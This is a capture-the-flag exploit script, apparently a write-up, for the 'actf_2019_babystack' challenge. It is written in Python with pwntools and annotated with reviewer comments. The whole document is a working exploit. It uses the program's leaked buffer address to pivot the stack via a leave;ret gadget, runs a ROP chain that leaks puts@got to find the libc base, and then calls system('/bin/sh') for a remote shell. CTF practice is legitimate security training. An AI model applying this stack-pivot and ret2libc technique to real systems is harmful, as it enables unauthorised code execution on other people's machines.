actf_2019_babystack

exp

简单栈迁移

from pwn import *

#context.log_level = 'debug'

# Target connection. The two commented-out alternatives run the challenge
# binary locally (the second through a debugger stub); only the remote is live.
io = remote('node3.buuoj.cn',27019)
#io = process('./ACTF_2019_babystack')
#io = process('./idaidg/linux_server64')
elf = ELF('./ACTF_2019_babystack')

# libc shipped with the challenge; its symbol offsets are used below to
# turn one leaked pointer into absolute addresses.
libc = ELF('./libc/libc-2.27.so')

# Hard-coded addresses in the (non-PIE, see the fixed 0x400xxx values) binary.
# They are named after the gadgets they are expected to resolve to
# (pop rdi; ret / function start / leave; ret / ret) — TODO confirm against the binary.
pop_rdi = 0x400ad3
puts_plt = elf.plt['puts'] 
puts_got = elf.got['puts']
start = 0x4008f6
leave = 0x400a18
ret = 0x400a4f

# Round 1: announce a 224-byte message. 224 == 0xd0 + 0x10, i.e. exactly the
# padded payload below plus the two trailing qwords (saved rbp, return address).
io.recvuntil("How many bytes of your message?")
io.sendline('224')

# The program prints where the message buffer lives; 14 chars = "0x" + 12 hex
# digits. This info leak is what makes the pivot below possible, since the
# fake stack has to be placed at a known address.
io.recvuntil("Your message will be saved at ")
addr = io.recv()[:14]
addr = int(addr,16)
print hex(addr)

# Fake stack frame written into the message buffer:
#   8 filler bytes  -> consumed by the `pop rbp` inside the leave gadget (assumed)
#   pop rdi; got    -> rdi = &puts@got
#   puts@plt        -> prints the resolved puts address (the leak)
#   start           -> restart the program for a second round
# Padded to 0xd0, then the saved rbp is overwritten with the buffer address
# and the return address with the leave gadget, so `leave; ret` moves rsp
# into the buffer (classic stack pivot, the 栈迁移 named in the title).
payload = 'a'* 8
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(start)
payload = payload.ljust(0xd0,'a')
payload += p64(addr)
payload += p64(leave)

io.send(payload)
# Take the 6 low bytes of the leaked pointer, located by scanning for the
# 0x7f high byte. NOTE(review): this relies on no earlier 0x7f byte in the
# output and on libc mapping at 0x7f..; it is fragile but usual for this setup.
puts_addr = io.recvuntil('\x7f')[-6:]
puts_addr = puts_addr.ljust(8,'\x00')
print hex(u64(puts_addr))
# libc base = leaked puts - offset(puts); everything else is base + offset.
libcbase = u64(puts_addr) - libc.symbols['puts']
system = libcbase + libc.symbols['system']
binsh = libcbase + libc.search('/bin/sh').next()

# Round 2 (program was restarted via `start`): same prompts, new buffer address.
io.recvuntil("How many bytes of your message?")
io.sendline('224')
io.recvuntil("Your message will be saved at ")
addr = io.recv()[:14]
addr = int(addr,16)
print hex(addr)

# Second fake frame: ret (presumably for 16-byte stack alignment before the
# libc call — TODO confirm), then system("/bin/sh") via pop rdi.
# Same pivot trailer as round 1.
payload = 'a'* 8
payload += p64(ret)
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system)
payload = payload.ljust(0xd0,'a')
payload += p64(addr)
payload += p64(leave)

# NOTE(review): round 1 used send(); sendline() here appends '\n', one byte
# past the announced 224. Presumably ignored by the program — TODO confirm.
io.sendline(payload)

io.interactive()
